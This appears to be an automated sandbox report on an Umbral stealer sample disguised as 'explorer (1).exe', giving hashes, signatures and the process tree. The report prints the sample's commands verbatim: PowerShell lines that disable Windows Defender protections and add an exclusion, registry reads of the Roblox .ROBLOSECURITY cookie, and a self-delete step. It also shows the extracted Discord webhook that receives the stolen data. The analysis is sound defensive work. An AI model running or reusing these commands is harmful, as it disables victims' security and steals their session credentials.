Analysis

  • max time kernel
    94s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-09-2024 18:21

General

  • Target

    explorer (1).exe

  • Size

    1.3MB

  • MD5

    575b9fa5e916d6e0fe48003127c0e7b3

  • SHA1

    ea732f7fcd8e0f20f8c66c8a0ab20880851c2f6e

  • SHA256

    e45dc08a9c9c96afdcbb33dc108417df2ec52ccb0bb1f776bc83770c70ef4739

  • SHA512

    3f337262446aad13ad05589f170149b916692ef4dffd1f005029dcbd01a6e703442d19678641501d466df9f3e264ed946ee39290141fc470ba545725d8fd3f14

  • SSDEEP

    24576:StvMlasKkTqxNx5V27DeEhP959IY9noqx78BXO/1byJRT:0gep23b9IUoqxT/1byJ

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1285146489047220246/6vaVojXPUSotwltFctwpYZfgInpOOjizCsR1Uwtcyb0_147wBk4FcBkKK4kpNTvlzaom

Signatures

  • Detect Umbral payload 4 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\explorer (1).exe
    "C:\Users\Admin\AppData\Local\Temp\explorer (1).exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:904
    • C:\Windows\SysWOW64\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:3984
    • C:\Windows\SysWOW64\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\explorer (1).exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Views/modifies file attributes
      PID:1136
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\explorer (1).exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1840
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3108
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3588
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4412
    • C:\Windows\SysWOW64\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:1256
    • C:\Windows\SysWOW64\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4844
    • C:\Windows\SysWOW64\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3752
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      PID:4572
    • C:\Windows\SysWOW64\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      2⤵
      • System Location Discovery: System Language Discovery
      • Detects videocard installed
      PID:2164
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\explorer (1).exe" && pause
      2⤵
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:3408
      • C:\Windows\SysWOW64\PING.EXE
        ping localhost
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2832

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    3d086a433708053f9bf9523e1d87a4e8

    SHA1

    b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

    SHA256

    6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

    SHA512

    931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    78085515614fa352c2e30ff050cd06a3

    SHA1

    bc057d8adf14372e2d62ef70fa62482783e408da

    SHA256

    f66b96adb56be3a00663094179de324f8b02cf1ff0cd732c954cbdb9c1d3195d

    SHA512

    5a012ad492a3119f5413302d13e165c516df1d6e8af9c606d194378ebee759d6e0866d730f36795672fed24c5ccdd9135bc5b64671ed03c2d4e88b3c6e0cb56d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    17KB

    MD5

    5e75ee31b7e34ba3669f9af64dab0358

    SHA1

    41ff4a90bacdc1003476152145febd40654e36d2

    SHA256

    ed15715eb8455efc2a223c2eebd883384933ddfba48751d513a9d9dcb5402509

    SHA512

    a5db964b7c78c504f16d39791ff3c7e45be78fab8c912e5fe13c8a6f6ae147288a8d49346265d33fd164667852af3cc72c2124b4dcfd6e313d8a80b8ebf34fe8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    c4fd743ec3f49eae45150d7c7736f446

    SHA1

    6a28da1291d4477c07d5727a43b688509e2d0dba

    SHA256

    ac4753cb1c79be0ff7b38a9e0603545c7bd0bac2a0ad8c354ccae24784c42aca

    SHA512

    11968c19761ad05a6e53c7c825323e65b011cab5b6f2c9ff05c74c4acabc263847a2f7f128404b736e7af6301302253c6b12863040eaad97e228effe1701c552

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    14KB

    MD5

    4ebde9c03347e319b051bd1b6f2b4142

    SHA1

    f7cd5ab154e90662affba628412cdc840c15813a

    SHA256

    6a824610ec3281d64ea8a72afe8634cfa430e63d175ffbc910adfc21bb0ab613

    SHA512

    5ee84e6b96302a668da8b2aed8d66389cec39863dc72f4c25b3e800f1273d325ae39b3cb4458acfb387dcb3971adbd47716faec83d628a0edf8fde33ba8547ac

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h5m2lmbj.zue.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/904-5-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/904-4-0x0000000007AF0000-0x0000000008094000-memory.dmp

    Filesize

    5.6MB

  • memory/904-131-0x00000000003D0000-0x000000000086E000-memory.dmp

    Filesize

    4.6MB

  • memory/904-136-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/904-114-0x000000000AEC0000-0x000000000AED2000-memory.dmp

    Filesize

    72KB

  • memory/904-113-0x000000000A090000-0x000000000A09A000-memory.dmp

    Filesize

    40KB

  • memory/904-51-0x00000000003D0000-0x000000000086E000-memory.dmp

    Filesize

    4.6MB

  • memory/904-111-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/904-0-0x00000000003D0000-0x000000000086E000-memory.dmp

    Filesize

    4.6MB

  • memory/904-135-0x00000000003D0000-0x000000000086E000-memory.dmp

    Filesize

    4.6MB

  • memory/904-97-0x00000000744DE000-0x00000000744DF000-memory.dmp

    Filesize

    4KB

  • memory/904-3-0x00000000074A0000-0x0000000007532000-memory.dmp

    Filesize

    584KB

  • memory/904-72-0x0000000009D70000-0x0000000009D8E000-memory.dmp

    Filesize

    120KB

  • memory/904-70-0x0000000009A10000-0x0000000009A86000-memory.dmp

    Filesize

    472KB

  • memory/904-71-0x0000000009CE0000-0x0000000009D30000-memory.dmp

    Filesize

    320KB

  • memory/904-2-0x00000000003D0000-0x000000000086E000-memory.dmp

    Filesize

    4.6MB

  • memory/904-1-0x00000000744DE000-0x00000000744DF000-memory.dmp

    Filesize

    4KB

  • memory/1840-10-0x0000000004FC0000-0x0000000004FE2000-memory.dmp

    Filesize

    136KB

  • memory/1840-27-0x0000000070370000-0x00000000703BC000-memory.dmp

    Filesize

    304KB

  • memory/1840-43-0x0000000007190000-0x00000000071AA000-memory.dmp

    Filesize

    104KB

  • memory/1840-42-0x00000000077D0000-0x0000000007E4A000-memory.dmp

    Filesize

    6.5MB

  • memory/1840-44-0x0000000007200000-0x000000000720A000-memory.dmp

    Filesize

    40KB

  • memory/1840-45-0x0000000007410000-0x00000000074A6000-memory.dmp

    Filesize

    600KB

  • memory/1840-46-0x0000000007390000-0x00000000073A1000-memory.dmp

    Filesize

    68KB

  • memory/1840-47-0x00000000073C0000-0x00000000073CE000-memory.dmp

    Filesize

    56KB

  • memory/1840-48-0x00000000073D0000-0x00000000073E4000-memory.dmp

    Filesize

    80KB

  • memory/1840-49-0x00000000074D0000-0x00000000074EA000-memory.dmp

    Filesize

    104KB

  • memory/1840-50-0x00000000074B0000-0x00000000074B8000-memory.dmp

    Filesize

    32KB

  • memory/1840-40-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/1840-54-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/1840-39-0x0000000007060000-0x0000000007103000-memory.dmp

    Filesize

    652KB

  • memory/1840-6-0x0000000004900000-0x0000000004936000-memory.dmp

    Filesize

    216KB

  • memory/1840-38-0x0000000006440000-0x000000000645E000-memory.dmp

    Filesize

    120KB

  • memory/1840-26-0x0000000007020000-0x0000000007052000-memory.dmp

    Filesize

    200KB

  • memory/1840-41-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/1840-28-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/1840-8-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/1840-25-0x0000000005EB0000-0x0000000005EFC000-memory.dmp

    Filesize

    304KB

  • memory/1840-7-0x0000000005070000-0x0000000005698000-memory.dmp

    Filesize

    6.2MB

  • memory/1840-24-0x0000000005E60000-0x0000000005E7E000-memory.dmp

    Filesize

    120KB

  • memory/1840-9-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/1840-23-0x0000000005840000-0x0000000005B94000-memory.dmp

    Filesize

    3.3MB

  • memory/1840-13-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/1840-12-0x0000000005710000-0x0000000005776000-memory.dmp

    Filesize

    408KB

  • memory/1840-11-0x00000000056A0000-0x0000000005706000-memory.dmp

    Filesize

    408KB

  • memory/3108-61-0x0000000005F60000-0x00000000062B4000-memory.dmp

    Filesize

    3.3MB

  • memory/3588-98-0x0000000006930000-0x0000000006952000-memory.dmp

    Filesize

    136KB

  • memory/3588-96-0x0000000006460000-0x00000000064AC000-memory.dmp

    Filesize

    304KB

  • memory/3588-94-0x0000000005D70000-0x00000000060C4000-memory.dmp

    Filesize

    3.3MB

  • memory/4572-117-0x0000000006160000-0x00000000064B4000-memory.dmp

    Filesize

    3.3MB

  • memory/4572-128-0x00000000068A0000-0x00000000068EC000-memory.dmp

    Filesize

    304KB